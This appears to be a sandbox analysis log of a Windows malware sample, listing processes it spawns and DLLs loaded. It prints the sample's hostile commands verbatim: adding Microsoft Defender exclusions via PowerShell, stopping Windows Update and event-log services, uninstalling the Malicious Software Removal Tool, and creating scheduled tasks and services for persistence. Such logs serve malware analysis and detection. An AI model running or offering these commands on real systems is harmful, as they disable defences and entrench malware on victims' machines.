Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\PerfDll\hyperProviderSavesinto.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | ReversingLabs: Detection: 60%
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | File read: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
Source: unknown | Process created: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe "C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe"
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Process created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe"
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Process created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe"
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /f
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
Source: unknown | Process created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 11 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "IFAYFBKT"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "IFAYFBKT"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: version.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: ntmarta.dllJump to behavior
